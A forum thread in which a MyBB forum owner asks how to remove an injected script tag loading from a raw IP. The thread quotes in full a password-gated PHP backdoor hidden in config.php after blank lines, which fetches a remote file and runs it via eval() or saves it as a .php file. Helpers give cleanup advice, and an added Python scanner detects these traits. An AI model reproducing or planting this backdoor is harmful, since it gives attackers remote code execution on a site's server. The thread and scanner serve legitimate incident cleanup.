How to remove this js virus
#1
My index file shows a script:
<script id="dgllhguk" src="http://91.196.216.64/s.php?ref=&lc=http://dreamdth.com/Forum/index.php&ua=Mozilla/5.0%20%28Windows%20NT%205.1%3B%20rv%3A5.0%29%20Gecko/20100101%20Firefox/5.0">

I think it is a virus, and all antivirus programs show this as multiple or blocked content.
It is found in index.php before the </head> tag. How can I find this in the MyBB folder? What is the location of this script id? Please help me: how can I delete this script from MyBB 1.6.5?
#2
Firstly, get rid of that snippet. Second, run File Verification in the ACP. Any files which you have not knowingly changed should be replaced.

Also, make sure there is no malicious code in inc/config.php . Watch carefully, because on occasion malicious code is placed after 2000 blank lines.

If you are paranoid enough, download a mybb package, and check to see if there are any extra files in your installation @ your site.
PGP Key (Fingerprint: 23B6 F4C0 FE2D 45AA 61A0 1E86 DB87 09DC DD87 6E40)
#3
:oops: <removed>
#4
Forum URL??
-Paul H.

Cogisne lingua latina?
#5
You might also want to check your .htaccess file to see if any redirects were added.
PGP Key (Fingerprint: 23B6 F4C0 FE2D 45AA 61A0 1E86 DB87 09DC DD87 6E40)
#6
Thanks, GamerVoid, for trying to solve my issue.
I checked my config.php and got

"if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '50905d7b2216bfeccb5b41016357176b'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}"

on line number 113. I deleted it and uploaded a fresh copy of the config file, which is 100 lines and 2819kb; the old file is 6896 kb.
I downloaded MyBB 1.6.5 and viewed config.php, but it shows blank in Notepad++.

Does anyone know if the config file should have the above script on line 2113?
#7
^ No, that is malicious code ..
#8
You can leave the actual English-like code above the malicious code and almost 2000 white lines. The (what I like to call) cURLy code needs to go though.

config.php is blank in the package because of it being different for everyone. It is written to during install, but see http://wiki.mybb.com/index.php/Inc/config.php to see what a safe config.php file looks like.
PGP Key (Fingerprint: 23B6 F4C0 FE2D 45AA 61A0 1E86 DB87 09DC DD87 6E40)
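
The checks suggested in this thread (code hidden after a long run of blank lines, request input passed to curl_init() or a fetched response passed to eval(), and the md5-named .php files the dropper writes), as an added Python example that is not part of the original posts or of MyBB. The threshold, the patterns, the function names and the sample tree are assumptions constructed for illustration; it also assumes MyBB's own template eval() calls pass a string literal, so only eval() of a bare variable is flagged.

```python
import re
import tempfile
from pathlib import Path

BLANK_RUN = 50  # assumption: a legitimate PHP file has no blank gap this long
PATTERNS = {
    "eval() on a bare variable": re.compile(r"\beval\s*\(\s*\$"),  # assumption, see lead-in
    "curl_init() on request input": re.compile(r"curl_init\s*\(\s*\$_(GET|POST|REQUEST)\b"),
    "remote script tag": re.compile(r"<script[^>]+src\s*=\s*[\"']?https?://", re.I),
}
DROPPED_NAME = re.compile(r"^[0-9a-f]{32}\.php$")  # md5(...).'.php', as in the thread

def scan_text(text):
    """Return (line_number, finding) pairs for one file's contents."""
    findings, blank = [], 0
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            blank += 1
            continue
        if blank >= BLANK_RUN:
            findings.append((lineno, f"code after {blank} blank lines"))
        blank = 0
        findings += [(lineno, name) for name, rx in PATTERNS.items() if rx.search(line)]
    return findings

def scan_tree(root):
    """Scan PHP and .htaccess files under root; also flag md5-named PHP files."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or not (path.suffix == ".php" or path.name == ".htaccess"):
            continue
        hits = scan_text(path.read_text(errors="replace"))
        if DROPPED_NAME.match(path.name):
            hits.append((0, "file name is a bare MD5 hash"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def build_sample(root):
    """Constructed sample tree: a config.php with a padded tail and one dropped file."""
    inc = Path(root) / "inc"
    inc.mkdir(parents=True)
    tail = "$ch = curl_init($_GET['file']);\n$re = curl_exec($ch);\neval($re);\n"
    (inc / "config.php").write_text("<?php\n$config['database']['type'] = 'mysqli';\n" + "\n" * 2000 + tail)
    (Path(root) / ("0" * 32 + ".php")).write_text("<?php // placeholder\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(scan_tree(tmp))
```

Findings are leads for manual review against a clean package, not verdicts; a hit on line 0 refers to the file name rather than its contents.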